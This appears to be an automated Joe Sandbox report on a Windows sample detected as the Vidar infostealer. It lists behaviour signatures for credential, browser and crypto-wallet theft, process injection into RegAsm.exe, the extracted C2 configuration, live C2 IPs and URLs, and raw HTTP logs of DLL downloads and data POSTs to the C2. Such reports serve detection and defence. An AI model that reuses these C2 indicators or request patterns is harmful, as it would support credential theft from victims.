Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1519637
MD5:2cce29d734ea1d227b338834698e2de4
SHA1:41700cd1bcf5f5bcca81ce722ed47fc17bd030c2
SHA256:f75acf936390f89239c43552717efb65c4c3190b16a7eec62dcd0053a045e91d
Tags:exeuser-Bitsight
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6128 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2CCE29D734EA1D227B338834698E2DE4)
    • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  0.2.file.exe.3fe5570.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.file.exe.3fe5570.2.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      0.2.file.exe.3fe5570.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 3 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T19:05:29.150702+020020287653Unknown Traffic192.168.2.5497165.75.211.162443TCP
                        2024-09-26T19:05:30.312845+020020287653Unknown Traffic192.168.2.5497175.75.211.162443TCP
                        2024-09-26T19:05:31.702222+020020287653Unknown Traffic192.168.2.5497185.75.211.162443TCP
                        2024-09-26T19:05:33.104487+020020287653Unknown Traffic192.168.2.5497195.75.211.162443TCP
                        2024-09-26T19:05:34.982172+020020287653Unknown Traffic192.168.2.5497205.75.211.162443TCP
                        2024-09-26T19:05:36.445705+020020287653Unknown Traffic192.168.2.5497215.75.211.162443TCP
                        2024-09-26T19:05:37.445668+020020287653Unknown Traffic192.168.2.5497225.75.211.162443TCP
                        2024-09-26T19:05:40.833080+020020287653Unknown Traffic192.168.2.5497235.75.211.162443TCP
                        2024-09-26T19:05:41.609248+020020287653Unknown Traffic192.168.2.5497245.75.211.162443TCP
                        2024-09-26T19:05:42.783781+020020287653Unknown Traffic192.168.2.5497255.75.211.162443TCP
                        2024-09-26T19:05:43.973906+020020287653Unknown Traffic192.168.2.5497265.75.211.162443TCP
                        2024-09-26T19:05:45.731071+020020287653Unknown Traffic192.168.2.5497275.75.211.162443TCP
                        2024-09-26T19:05:47.499648+020020287653Unknown Traffic192.168.2.5497285.75.211.162443TCP
                        2024-09-26T19:05:49.080817+020020287653Unknown Traffic192.168.2.5497295.75.211.162443TCP
                        2024-09-26T19:05:50.522089+020020287653Unknown Traffic192.168.2.5497305.75.211.162443TCP
                        2024-09-26T19:05:51.810151+020020287653Unknown Traffic192.168.2.5497315.75.211.162443TCP
                        2024-09-26T19:05:54.892995+020020287653Unknown Traffic192.168.2.5497325.75.211.162443TCP
                        2024-09-26T19:05:56.180974+020020287653Unknown Traffic192.168.2.5497335.75.211.162443TCP
                        2024-09-26T19:05:57.843408+020020287653Unknown Traffic192.168.2.5497345.75.211.162443TCP
                        2024-09-26T19:05:59.292302+020020287653Unknown Traffic192.168.2.5497355.75.211.162443TCP
                        2024-09-26T19:06:01.413460+020020287653Unknown Traffic192.168.2.5497365.75.211.162443TCP
                        2024-09-26T19:06:03.295823+020020287653Unknown Traffic192.168.2.5497385.75.211.162443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T19:05:33.812539+020020442471Malware Command and Control Activity Detected5.75.211.162443192.168.2.549719TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T19:05:35.680099+020020518311Malware Command and Control Activity Detected5.75.211.162443192.168.2.549720TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T19:05:35.679915+020020490871A Network Trojan was detected192.168.2.5497205.75.211.162443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T19:06:06.929545+020028032702Potentially Bad Traffic192.168.2.549739172.105.54.160443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://5.75.211.162/mozglue.dllAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199780418869/badgesAvira URL Cloud: Label: malware
                        Source: https://5.75.211.162/freebl3.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.211.162/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.211.162Avira URL Cloud: Label: malware
                        Source: https://t.me/ae5edAvira URL Cloud: Label: malware
                        Source: https://5.75.211.162/softokn3.dll6V#~Avira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199780418869/inventory/Avira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199780418869Avira URL Cloud: Label: malware
                        Source: https://5.75.211.162/xmx~3Avira URL Cloud: Label: malware
                        Source: https://5.75.211.162/softokn3.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.211.162/sqlp.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.211.162/msvcp140.dllAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004080A1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00408048
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00411E5D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,2_2_0040A7D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C0A6C80
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.5:49739 version: TLS 1.2
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: c:\rje\tg\obj\Release\ojc.pdb source: file.exe
                        Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.3315681328.000000003AE07000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.3310118998.000000002EF2B000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041543D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]2_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax2_2_004014AD

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49720 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.5:49720
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.5:49719
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                        Source: Joe Sandbox ViewIP Address: 5.75.211.162 5.75.211.162
                        Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49717 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49722 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49718 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49719 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49720 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49716 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49721 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49723 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49724 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49725 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49727 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49728 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49729 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49726 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49730 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49731 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49732 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49736 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 5.75.211.162:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49739 -> 172.105.54.160:443
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 5765Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
